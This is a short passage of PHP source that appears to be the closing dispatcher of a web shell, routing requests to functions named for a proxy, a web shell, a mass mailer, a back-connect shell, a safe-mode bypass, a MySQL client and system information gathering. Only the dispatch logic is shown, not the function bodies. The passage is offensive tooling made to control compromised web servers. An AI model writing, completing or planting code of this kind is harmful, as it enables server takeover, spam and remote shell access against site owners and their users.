case 'px':pr0xy();break; case 'webshell':webshelL();break; case 'mailer':maileR();break; case 'br':brshelL();break; case 'asm':safemodE();break; case 'mysql':mysqlclienT();break; case 'calc':calC();break; case 'sysinfo':sysinfO();break; case 'checksum':checksuM($_REQUEST['filE']);break; case 'logout':logouT();break; default: echo $intro; }}else echo $intro; echo $footer;?></body></html>